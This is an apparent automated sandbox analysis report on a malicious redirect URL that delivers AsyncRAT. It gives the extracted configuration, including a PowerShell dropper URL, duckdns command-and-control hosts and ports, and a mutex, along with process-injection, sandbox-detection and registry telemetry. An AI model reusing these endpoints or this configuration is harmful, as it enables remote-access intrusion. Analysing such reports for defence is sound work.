asyncrat | hxxps://api[.]getwemail[.]io/redirect-to/9cdc304a-b51f-4832-90f8-ef21825e30e9[:]01c8ea7ad58cbd5ea4e827d806068608/8006b2393b77ce204f6a2513f4d63334?email_id=4730d583-7964-45c8-8c12-c2c79e860582

Analysis

max time kernel
114s
max time network
110s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
18-06-2024 18:29

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://api.getwemail.io/redirect-to/9cdc304a-b51f-4832-90f8-ef21825e30e9:01c8ea7ad58cbd5ea4e827d806068608/8006b2393b77ce204f6a2513f4d63334?email_id=4730d583-7964-45c8-8c12-c2c79e860582

Score

10^/10

asyncrat rxr execution rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://23.26.108.213:222/gov.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://www.autohotkey.com/download/1.1/AutoHotkey112304_ansi.zip

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://nodejs.org/download/release/latest-v0.12.x/node.exe

Extracted

Family

asyncrat

Version

AWS | 3Losh

Botnet

RxR

fr31ndz.duckdns.org:6606

fr31ndz.duckdns.org:7707

fr31ndz.duckdns.org:8808

Mutex

AsyncMutex_RxR

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Blocklisted process makes network request 1 IoCs

Processes:

WScript.exe

flow pid process

28 612 WScript.exe
Downloads MZ/PE file
Executes dropped EXE 4 IoCs

Processes:

AutoHotkey.exeAutoHotkey.exeAutoHotkey.exeAutoHotkey.exe

pid process

3540 AutoHotkey.exe
5012 AutoHotkey.exe
4584 AutoHotkey.exe
2852 AutoHotkey.exe

flow	pid	process
28	612	WScript.exe

pid	process
3540	AutoHotkey.exe
5012	AutoHotkey.exe
4584	AutoHotkey.exe
2852	AutoHotkey.exe

Enumerates connected drives 3 TTPs 4 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe
File opened (read-only)	\??\E:	WScript.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 5000 set thread context of 2636	5000	powershell.exe	aspnet_compiler.exe
PID 2844 set thread context of 2984	2844	powershell.exe	aspnet_compiler.exe
PID 4688 set thread context of 2532	4688	powershell.exe	aspnet_compiler.exe
PID 2224 set thread context of 2380	2224	powershell.exe	aspnet_compiler.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1364	powershell.exe
4144	powershell.exe
4148	powershell.exe
5000	powershell.exe
2844	powershell.exe
5004	powershell.exe
1100	powershell.exe
3360	powershell.exe
5020	powershell.exe
4688	powershell.exe
2224	powershell.exe
5092	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 64 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

svchost.exechrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\CompatibleIDs	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Capabilities	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Service	chrome.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0006	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000003\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Mfg	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

svchost.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133632089863041416"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

Modifies registry class 5 IoCs

Processes:

chrome.exeWScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-1687926120-3022217735-1146543763-1000_Classes\Local Settings	WScript.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenode.exepowershell.exe

pid	process
4948	chrome.exe
4948	chrome.exe
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
4092	powershell.exe
2604	powershell.exe
2604	powershell.exe
2604	powershell.exe
3472	powershell.exe
3472	powershell.exe
3472	powershell.exe
2604	powershell.exe
3472	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
4472	powershell.exe
2252	powershell.exe
2252	powershell.exe
2252	powershell.exe
2252	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
740	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
4688	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
4980	powershell.exe
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
3360	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe
1364	powershell.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
4144	powershell.exe
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe
4148	powershell.exe
2544	powershell.exe
2544	powershell.exe
2544	powershell.exe
4220	node.exe
4220	node.exe
2544	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe
5000	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

4948 chrome.exe
4948 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeShutdownPrivilege	4948	chrome.exe
Token: SeCreatePagefilePrivilege	4948	chrome.exe
Token: SeDebugPrivilege	2604	powershell.exe
Token: SeDebugPrivilege	3472	powershell.exe
Token: SeShutdownPrivilege	4948	chrome.exe

Suspicious use of FindShellTrayWindow 44 IoCs

Processes:

chrome.exeAutoHotkey.exeAutoHotkey.exeAutoHotkey.exeAutoHotkey.exe

pid	process
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
3540	AutoHotkey.exe
5012	AutoHotkey.exe
3540	AutoHotkey.exe
5012	AutoHotkey.exe
4584	AutoHotkey.exe
4584	AutoHotkey.exe
2852	AutoHotkey.exe
2852	AutoHotkey.exe

Suspicious use of SendNotifyMessage 32 IoCs

Processes:

chrome.exeAutoHotkey.exeAutoHotkey.exeAutoHotkey.exeAutoHotkey.exe

pid	process
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
4948	chrome.exe
3540	AutoHotkey.exe
5012	AutoHotkey.exe
3540	AutoHotkey.exe
5012	AutoHotkey.exe
4584	AutoHotkey.exe
4584	AutoHotkey.exe
2852	AutoHotkey.exe
2852	AutoHotkey.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 4948 wrote to memory of 392	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 392	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
PID 4948 wrote to memory of 4004	4948	chrome.exe	chrome.exe
